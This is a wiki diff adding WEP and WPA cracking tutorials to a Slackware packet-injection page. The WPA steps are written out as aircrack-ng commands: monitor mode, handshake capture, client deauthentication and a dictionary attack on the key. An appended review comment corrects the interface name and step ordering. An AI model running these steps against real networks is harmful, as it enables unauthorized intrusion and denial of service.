slackware:packet_injection
slackware:packet_injection [2011/06/21 23:42] slack
slackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
Line 44: Line 44:
 make unload make unload
 </code> </code>
 +
 +====== Cracking WEP ======
  
 Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial): Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial):
Line 200: Line 202:
       Probability: 100%       Probability: 100%
 </code> </code>
 +
 +====== Cracking WPA ======
 +
 +===== 1. Put the Wireless Interface into Monitor Mode =====
 +
 +<code bash>
 +airmon-ng start wlan0 9
 +</code>
 +
 +Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers).
 +
 +===== 2. Listen for a Handshake =====
 +
 +The handshake is the only interesting and useful part of communication between AP and client.
 +
 +<code bash>
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
 +</code>
 +
 +Where:
 +  * -c 9 is the channel for the wireless network
 +  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
 +  * -w psk is the file name prefix for the file which will contain the IVs.
 +  * mon0 is the interface name.
 +
 +Success looks like this -- notice the "WPA handshake:..." in the top right.
 +
 +<code bash>
 +  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
 +                                                                                                               
 +  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 +                                                                                                               
 +  00:14:6C:7E:40:80   39 100       51      116   14    54  WPA2 CCMP   PSK  teddy                           
 +                                                                                                               
 +  BSSID              STATION            PWR  Lost  Packets  Probes                                             
 +                                                                                                               
 +  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35          116
 +</code>
 +
 +===== 3. (if necessary) Deauthenticate a client to capture a handshake =====
 +
 +You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake.
 +
 +<code bash>
 + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
 +</code>
 +
 +Where:
 +  * -0 means deauthentication
 +  * 1 is the number of deauths to send (you can send multiple if you wish)
 +  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
 +  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
 +  * ath0 is the interface name
 +
 +===== 4. Crack the pre-shared key =====
 +
 +<code bash>
 +aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
 +</code>
 +
 +Where:
 +  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
 +  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
 +
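Review bot: step 3's `aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0` sends the deauth on `ath0`, but step 1 created `mon0` with `airmon-ng start wlan0 9` and step 2 captures on `mon0`; the deauth has to leave on the same monitor-mode interface that is capturing, so the command should end in `mon0` and the bullet "ath0 is the interface name" should be changed to match. Two related points in the same hunk: the `-w psk` bullet in step 2 says the file "will contain the IVs", which is WEP wording carried over from the section above; for WPA the capture file matters because it holds the "WPA handshake:" that airodump-ng reports, so describe it as the capture file for the handshake. And step 3 only achieves anything while the airodump-ng capture from step 2 is still running (in a second terminal), since the re-association it forces is what airodump-ng must see; the numbered steps read as strictly sequential, so say this explicitly. Lastly, the step 4 bullets explain `-w password.lst` and `*.cap` but not `-b 00:14:6C:7E:40:80`; add a bullet noting it is the BSSID of the target access point, as in step 2.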
slackware/packet_injection.1308699758.txt.gz · Last modified: 2019/11/07 17:58 (external edit)